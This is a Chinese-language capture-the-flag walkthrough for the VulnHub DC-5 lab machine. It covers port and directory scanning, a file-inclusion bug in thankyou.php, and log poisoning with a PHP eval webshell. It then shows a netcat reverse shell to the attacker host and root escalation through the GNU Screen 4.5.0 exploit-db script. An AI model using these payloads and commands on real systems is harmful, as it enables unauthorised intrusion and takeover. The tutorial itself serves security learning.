DC-5靶机渗透测试详细教程
DC-5靶机渗透测试详细教程
DC-5
DC-5下载:https://download.vulnhub.com/dc/DC-5.zip.torrent
攻击者kali:192.168.1.9
受害者DC-5:192.168.1.8
通过arp-scan -l扫描到了DC-5的IP地址
使用nmap扫描一下端口
nmap -sS -A 192.168.1.8 -p 1-65535
发现有一个80端口和111端口并且运行着rpcinfo服务,39098
发现有个留言窗口,但是使用xss没有反应
反而提交的时候底部的时间总会变
安装dirsearch来扫描一下
dirsearch是一个目录扫描工具,目的是扫描网站敏感的文件和目录
apt-get install dirsearch
dirsearch用法
-u 指定网站 -w指定字典 -r递归目录
-random-agents 使用随机UA
dirsearch -u http://192.168.1.8
扫描出来发现只有footer.php这个没有出现过;原本以为thankyou.php也有点嫌疑,后面访问之后发现是留言板之后的页面
尝试访问footer.php
每刷新一次,时间都会变
留言版的日期也是会变,thankyou.php包含了footer.php页面
这是不是有可能存在文件包含漏洞
尝试一下看看
file=/etc/passwd
查看passwd的文件,但是没有可以登录的
使用burp抓包修改数据
将一句话木马写入
<?php @eval($_POST['demon']);?>
点击发送
然后再修改成日志文件
因为执行的内容会被日志记录下来,通过Wappalyzer查看到了是nginx1.6.2版本的
它的日志会记录在/var/log/nginx/error.log
var/log/nginx/access.log
fan
再点击发送
在响应这边能看到了木马
使用蚁剑连接
http://192.168.1.8/thankyou.php?file=/var/log/nginx/error.log
连接成功
在终端简历反弹交互shell
kali 监听
反弹shell
python -c 'import pty;pty.spawn("/bin/bash")'
尝试提权
查看有suid的文件夹
find / -perm -u=s -type f 2>/dev/null
看到有个screen-4.5.0的版本号
GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话,并在其间自由切换。
GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。
搜索漏洞
去kali漏洞库搜索一下
发现有两个漏洞
先查看第一个
将第一个复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)
第一步在桌面创建一个文件夹存放三个部分的脚本
使用命令vim创建第一个libhax.c
然后编译这个脚本
gcc -fPIC -shared -ldl -o libhax.so libhax.c
使用vim命令创建第二个rootshell.c
再编译
gcc -o rootshell rootshell.c
最后一个部分dc5.sh
执行完后,你会发现文件夹里有五个文件
将后缀.C的文件删掉
然后将三个文件上传到tmp文件中
注意是根目录下的tmp
然后重命名,把路径去掉
回到kali反弹的shell
进入到tmp目录
chmod 777 .dc5.sh 给dc5.sh权限
拿到root用户,成功提权
在root目录下拿到flag
DC-5总结
dirsearch目录扫描工具的使用及安装
文件包含漏洞的发现尝试?file=/etc/passwd打开文件是否是文件包含漏洞
burp抓包修改数据将一句话木马发送到靶机,查看Nginx日志是否有一句话木马
nginx日志文件
/var/log/nginx/error.log var/log/nginx/access.log
nc 192.168.1.9 4444 -e /bin/sh 反弹
kali监听 nc -lvpn 4444
python -c 'import pty;pty.spawn("/bin/sh")' shell交互使用
查看suid的文件夹 find / -perm -u=s -type f 2>/dev/null
kali搜索screen-4.5.0漏洞
GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话,并在其间自由切换。
GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。
使用41145.sh脚本提权
更多推荐
所有评论(0)